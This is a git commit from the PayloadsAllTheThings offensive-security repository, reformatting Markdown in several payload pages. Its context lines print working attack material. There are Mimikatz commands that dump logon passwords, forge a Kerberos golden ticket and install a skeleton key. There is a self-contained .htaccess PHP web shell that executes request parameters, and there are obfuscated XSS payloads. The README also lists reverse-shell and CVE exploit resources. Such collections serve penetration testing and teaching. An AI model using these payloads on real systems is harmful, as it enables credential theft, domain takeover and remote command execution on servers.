Markdown formatting - Part 2

2024-12-19 19:06:12 +00:00 · 2018-08-13 12:01:13 +02:00 · 2018-08-13 12:01:13 +02:00 · b87e14a0ed
commit b87e14a0ed
parent 65654f81a4
5 changed files with 126 additions and 107 deletions
--- a/Resources/Windows
+++ b/Resources/Windows
@ -2,40 +2,45 @@
 ![Data in memory](http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png)
-## Mimikatz basic
+## Mimikatz - Execute commands
 Only one command
-```bash
+```powershell
 PS C:\temp\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit
 ```
 Mimikatz console (multiple commands)
-```bash
+```powershell
 PS C:\temp\mimikatz> .\mimikatz
 mimikatz # privilege::debug
 mimikatz # sekurlsa::logonpasswords
 mimikatz # sekurlsa::wdigest
 ```
 ## Mimikatz - Extract passwords
 ```powershell
 mimikatz_command -f sekurlsa::logonPasswords full
 mimikatz_command -f sekurlsa::wdigest
 ```
-Mimikatz Golden ticket
+## Mimikatz Golden ticket
 ```powershell
-.\mimikatz kerberos::golden /admin:ADMIINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt
+.\mimikatz kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt
 ```
 ```powershell
 .\mimikatz "kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit
 ```
-Mimikatz Skeleton key
+## Mimikatz Skeleton key
 ```powershell
 privilege::debug
 misc::skeleton
 # map the share
 net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz
 # login as someone
--- a/README.md
+++ b/README.md
@ -1,100 +1,110 @@
 # Payloads All The Things
 A list of useful payloads and bypasses for Web Application Security.
 Feel free to improve with your payloads and techniques !
 I <3 pull requests :)
-You can also contribute with a beer IRL or [![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky)
+
 You can also contribute with a beer IRL or with `buymeacoffee.com`
 [![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky)
 Every section contains:
-  - README.md - vulnerability description and how to exploit it
+
-  - Intruders - a set of files to give to Burp Intruder
+- README.md - vulnerability description and how to exploit it
-  - Some exploits
+- Intruders - a set of files to give to Burp Intruder
 - Some exploits
 You might also like :
  * [Methodology and Resources](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/)
    * [Active Directory Attack.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md)
    * [Methodology_and_enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Methodology_and_enumeration.md)
    * [Network Pivoting Techniques.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md)
    * [Reverse Shell Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
    * [Windows - Download and Execute.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute.md)
    * [Windows - Mimikatz.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md)
    * [Windows - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Persistence.md)
    * [Windows - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)
    * [Windows - Using credentials.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Using%20credentials.md)
  * [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits)
    * Apache Struts 2 CVE-2017-5638.py
    * Apache Struts 2 CVE-2017-9805.py
    * Drupalgeddon2 CVE-2018-7600.rb
    * Heartbleed CVE-2014-0160.py
    * Shellshock CVE-2014-6271.py
    * Tomcat CVE-2017-12617.py
 - [Methodology and Resources](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/)
  - [Active Directory Attack.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md)
  - [Methodology_and_enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Methodology_and_enumeration.md)
  - [Network Pivoting Techniques.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md)
  - [Reverse Shell Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
  - [Windows - Download and Execute.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute.md)
  - [Windows - Mimikatz.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md)
  - [Windows - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Persistence.md)
  - [Windows - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)
  - [Windows - Using credentials.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Using%20credentials.md)
 - [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits)
  - Apache Struts 2 CVE-2017-5638.py
  - Apache Struts 2 CVE-2017-9805.py
  - Drupalgeddon2 CVE-2018-7600.rb
  - Heartbleed CVE-2014-0160.py
  - Shellshock CVE-2014-6271.py
  - Tomcat CVE-2017-12617.py
 ## Try Harder
 Ever wonder where you can use your knowledge ? The following list will help you find "targets" to improve your skills.
-* __Bug Bounty Platforms__
+- __Bug Bounty Platforms__
-  * [HackerOne](https://hackerone.com)
+  - [HackerOne](https://hackerone.com)
-  * [BugCrowd](https://bugcrowd.com)
+  - [BugCrowd](https://bugcrowd.com)
-  * [Bounty Factory](https://bountyfactory.io)
+  - [Bounty Factory](https://bountyfactory.io)
-  * [Synack](https://www.synack.com/)
+  - [Synack](https://www.synack.com/)
-  * [Intigriti](https://www.intigriti.com)
+  - [Intigriti](https://www.intigriti.com)
-  * [List of Bounty Program](https://bugcrowd.com/list-of-bug-bounty-programs/)
+  - [List of Bounty Program](https://bugcrowd.com/list-of-bug-bounty-programs/)
-* __Online Platforms__
+- __Online Platforms__
-  * [Hack The Box](hackthebox.eu/)
+  - [Hack The Box](hackthebox.eu/)
-  * [Penetration test lab "Test lab" | Pentestit](https://lab.pentestit.ru)
+  - [Penetration test lab "Test lab" | Pentestit](https://lab.pentestit.ru)
-  * [PentesterLab : Learn Web Penetration Testing: The Right Way](https://pentesterlab.com/)
+  - [PentesterLab : Learn Web Penetration Testing: The Right Way](https://pentesterlab.com/)
-  * [Zenk-Security](https://www.zenk-security.com/epreuves.php)
+  - [Zenk-Security](https://www.zenk-security.com/epreuves.php)
-  * [Root-Me](https://www.root-me.org)
+  - [Root-Me](https://www.root-me.org)
-  * [W3Challs](https://w3challs.com/)
+  - [W3Challs](https://w3challs.com/)
-  * [NewbieContest](https://www.newbiecontest.org/)
+  - [NewbieContest](https://www.newbiecontest.org/)
-  * [Vulnhub](https://www.vulnhub.com/)
+  - [Vulnhub](https://www.vulnhub.com/)
-  * [The Cryptopals Crypto Challenges](https://cryptopals.com/)
+  - [The Cryptopals Crypto Challenges](https://cryptopals.com/)
-  * [alert(1) to win](https://alf.nu/alert1)
+  - [alert(1) to win](https://alf.nu/alert1)
-  * [Hacksplaining](https://www.hacksplaining.com/exercises)
+  - [Hacksplaining](https://www.hacksplaining.com/exercises)
-  * [HackThisSite](https://hackthissite.org)
+  - [HackThisSite](https://hackthissite.org)
-  * [Hackers.gg](hackers.gg)
+  - [Hackers.gg](hackers.gg)
-  * [Mind Map - Penetration Testing Practice Labs - Aman Hardikar](http://www.amanhardikar.com/mindmaps/Practice.html)
+  - [Mind Map - Penetration Testing Practice Labs - Aman Hardikar](http://www.amanhardikar.com/mindmaps/Practice.html)
 ## Book's list
 Grab a book and relax, these ones are the best security books (in my opinion).
 * [Web Hacking 101](https://leanpub.com/web-hacking-101)
 * [Breaking into Information Security: Learning the Ropes 101 - Andrew Gill](https://leanpub.com/ltr101-breaking-into-infosec)
 * [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project)
 * [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn)
 * [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa)
 * [The Hacker Playbook 3: Practical Guide to Penetration Testing - Red Team Edition](http://a.co/6MqC9bD)
 * [The Mobile Application Hacker’s Handbook](http://amzn.to/2cVOIrE)
 * [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
 * [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit)
 * [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
 * [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
 * [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
 * [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
 * [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)
 * [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)
 * [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
 * [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
 * [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking)
 Grab a book and relax, these ones are the best security books (in my opinion).
 - [Web Hacking 101](https://leanpub.com/web-hacking-101)
 - [Breaking into Information Security: Learning the Ropes 101 - Andrew Gill](https://leanpub.com/ltr101-breaking-into-infosec)
 - [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project)
 - [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn)
 - [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa)
 - [The Hacker Playbook 3: Practical Guide to Penetration Testing - Red Team Edition](http://a.co/6MqC9bD)
 - [The Mobile Application Hacker’s Handbook](http://amzn.to/2cVOIrE)
 - [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
 - [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit)
 - [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
 - [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
 - [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
 - [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
 - [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)
 - [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)
 - [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
 - [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
 - [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking)
 ## More resources
 ### Blogs/Websites
-* [BUG BOUNTY FIELD MANUAL: THE DEFINITIVE GUIDE FOR PLANNING, LAUNCHING, AND OPERATING A SUCCESSFUL BUG BOUNTY PROGRAM](https://www.hackerone.com/blog/the-bug-bounty-field-manual)
+
-* [How to become a Bug Bounty Hunter - Sam Houston](https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102)
+- [BUG BOUNTY FIELD MANUAL: THE DEFINITIVE GUIDE FOR PLANNING, LAUNCHING, AND OPERATING A SUCCESSFUL BUG BOUNTY PROGRAM](https://www.hackerone.com/blog/the-bug-bounty-field-manual)
-* [Tips from Top Hackers – Bug Hunting methodology and the importance of writing quality submissions - Sam Houston](https://www.bugcrowd.com/tips-from-top-hackers-bug-hunting-methodology-and-the-importance-of-writing-quality-submissions/)
+- [How to become a Bug Bounty Hunter - Sam Houston](https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102)
-* [ARNE SWINNEN'S SECURITY BLOG JUST ANOTHER INFOSEC BLOG](https://www.arneswinnen.net)
+- [Tips from Top Hackers – Bug Hunting methodology and the importance of writing quality submissions - Sam Houston](https://www.bugcrowd.com/tips-from-top-hackers-bug-hunting-methodology-and-the-importance-of-writing-quality-submissions/)
-* [XSS Jigsaw - innerht.ml](https://blog.innerht.ml)
+- [ARNE SWINNEN'S SECURITY BLOG JUST ANOTHER INFOSEC BLOG](https://www.arneswinnen.net)
-* [ZeroSec Blog: Featuring Write-Ups, Projects & Adventures](https://blog.zsec.uk/tag/ltr101/)
+- [XSS Jigsaw - innerht.ml](https://blog.innerht.ml)
 - [ZeroSec Blog: Featuring Write-Ups, Projects & Adventures](https://blog.zsec.uk/tag/ltr101/)
 ### Youtube
 * [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)
 * [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc)
 * [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8)
 * [IppSec Channel - Hack The Box Writeups](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)
 - [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)
 - [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc)
 - [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8)
 - [IppSec Channel - Hack The Box Writeups](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)
 ### Docker
 | Command     | Link |
 | :------------- | :------------- |
 | `docker pull remnux/metasploit` | [docker-metasploit](https://hub.docker.com/r/remnux/metasploit/) |
--- a/.htaccess/README.md
+++ b/.htaccess/README.md
@ -1,10 +1,11 @@
 # .htaccess upload
 Uploading an .htaccess file to override Apache rule and execute PHP.
 "Hackers can also use “.htaccess” file tricks to upload a malicious file with any extension and execute it. For a simple example, imagine uploading to the vulnerabler server an .htaccess file that has AddType application/x-httpd-php .htaccess configuration and also contains PHP shellcode. Because of the malicious .htaccess file, the web server considers the .htaccess file as an executable php file and executes its malicious PHP shellcode. One thing to note: .htaccess configurations are applicable only for the same directory and sub-directories where the .htaccess file is uploaded."
 Self contained .htaccess web shell
-```
+
 ```python
 # Self contained .htaccess web shell - Part of the htshell project
 # Written by Wireghoul - http://www.justanotherhacker.com
@ -17,11 +18,14 @@ Allow from all
 # Make .htaccess file be interpreted as php file. This occur after apache has interpreted
 # the apache directoves from the .htaccess file
 AddType application/x-httpd-php .htaccess
 ###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######
 ```
 ```php
 ###### SHELL ######
 <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>
 ```
 ## Thanks to
-* [ATTACKING WEBSERVERS VIA .HTACCESS - By Eldar Marcussen ](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html)
+
 * [ATTACKING WEBSERVERS VIA .HTACCESS - By Eldar Marcussen](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html)
 * [](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)
--- a/injection/README.md
+++ b/injection/README.md
@ -571,7 +571,7 @@ Bypass using HTML encoding
 %26%2397;lert(1)
 ```
-Bypass using Katakana (https://github.com/aemkei/katakana.js)
+Bypass using [Katakana](https://github.com/aemkei/katakana.js)
 ```javascript
 javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
@ -723,7 +723,7 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
 ?"></script><base%20c%3D=href%3Dhttps:\mysite>
 ```
-## More fun ?
+## More fun
 This section will be used for the "fun/interesting/useless" stuff.
@ -743,9 +743,9 @@ Try here : [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php
 - [(Relative Path Overwrite) RPO XSS - Infinite Security](http://infinite8security.blogspot.com/2016/02/welcome-readers-as-i-promised-this-post.html)
 - [RPO TheSpanner](http://www.thespanner.co.uk/2014/03/21/rpo/)
 - [RPO Gadget - innerthmtl](http://blog.innerht.ml/rpo-gadgets/)
- http://support.detectify.com/customer/portal/articles/2088351-relative-path-overwrite
+- [Relative Path Overwrite - Detectify](http://support.detectify.com/customer/portal/articles/2088351-relative-path-overwrite)
- http://d3adend.org/xss/ghettoBypass
+- [XSS ghettoBypass - d3adend](http://d3adend.org/xss/ghettoBypass)
- http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html
+- [XSS without HTML: Client-Side Template Injection with AngularJS](http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html)
- http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html
+- [XSSING WEB PART - 2 - Rakesh Mane](http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html)
- https://medium.com/@tbmnull/making-an-xss-triggered-by-csp-bypass-on-twitter-561f107be3e5
+- [Making an XSS triggered by CSP bypass on Twitter. @tbmnull](https://medium.com/@tbmnull/making-an-xss-triggered-by-csp-bypass-on-twitter-561f107be3e5)
- https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309
+- [Ways to alert(document.domain) - @tomnomnom](https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309)